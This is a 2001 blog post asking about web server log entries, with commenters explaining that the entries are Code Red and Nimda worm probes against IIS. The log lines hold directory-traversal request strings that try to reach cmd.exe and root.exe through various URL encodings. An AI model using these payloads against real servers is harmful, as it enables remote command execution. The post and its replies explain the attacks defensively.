Posted On October 20, 2001

Filed under Uncategorized

Comments Dropped 4 responses


Is it bad to see this in your server logs?
10/20/2001 04:19:10 ERR! 64.221.78.131 /scripts/root.exe 195 GET /c+dir 16 www 404 Main Server
10/20/2001 04:19:10 ERR! 64.221.78.131 /MSADC/root.exe 195 GET /c+dir 19 www 404 Main Server
10/20/2001 04:19:10 ERR! 64.221.78.131 /c/winnt/system32/cmd.exe 195 GET /c+dir 18 www 404 Main Server
10/20/2001 04:19:11 ERR! 64.221.78.131 /d/winnt/system32/cmd.exe 195 GET /c+dir 19 www 404 Main Server
10/20/2001 04:19:11 ERR! 64.221.78.131 /scripts/..%255c../winnt/system32/cmd.exe 195 GET /c+dir 15 www 404 Main Server
10/20/2001 04:19:11 ERR! 64.221.78.131 /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 195 GET /c+dir 18 www 404 Main Server
10/20/2001 04:19:11 ERR! 64.221.78.131 /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 195 GET /c+dir 15 www 404 Main Server
10/20/2001 04:19:12 ERR! 64.221.78.131 /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 195 GET /c+dir 18 www 404 Main Server
10/20/2001 04:19:12 ERR! 64.221.78.131 /scripts/..%c1%1c../winnt/system32/cmd.exe 195 GET /c+dir 15 www 404 Main Server
10/20/2001 04:19:12 ERR! 64.221.78.131 /scripts/..%c0%2f../winnt/system32/cmd.exe 195 GET /c+dir 21 www 404 Main Server
10/20/2001 04:19:13 ERR! 64.221.78.131 /scripts/..%c0%af../winnt/system32/cmd.exe 195 GET /c+dir 18 www 404 Main Server
10/20/2001 04:19:13 ERR! 64.221.78.131 /scripts/..%c1%9c../winnt/system32/cmd.exe 195 GET /c+dir 17 www 404 Main Server
10/20/2001 04:19:13 ERR! 64.221.78.131 /scripts/..%%35%63../winnt/system32/cmd.exe 195 GET /c+dir 16 www 404 Main Server
10/20/2001 04:19:14 ERR! 64.221.78.131 /scripts/..%%35c../winnt/system32/cmd.exe 195 GET /c+dir 16 www 404 Main Server
10/20/2001 04:19:14 ERR! 64.221.78.131 /scripts/..%25%35%63../winnt/system32/cmd.exe 195 GET /c+dir 18 www 404 Main Server
10/20/2001 04:19:14 ERR! 64.221.78.131 /scripts/..%252f../winnt/system32/cmd.exe 195 GET /c+dir 20 www 404 Main Server

Advertisements

4 Responses to “”

  1. alicemac

    Yes it is extremely bad. It tells you that your server is running NT and that can’t be good at all 😛 ehehe

  2. fanless

    Yeah, I figured that much… But why would something be looking for system files? Is it a worm or virus or something?

    • dethbunny

      It’s attempts to exploit MS’s IIS web server; it’s that Code Red worm and other various offspring of that virus (including Nimda) ‘attacking’ your server. You don’t run IIS, though, so your server jsut records an arror and carries on. It’s nothing to worry about.

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s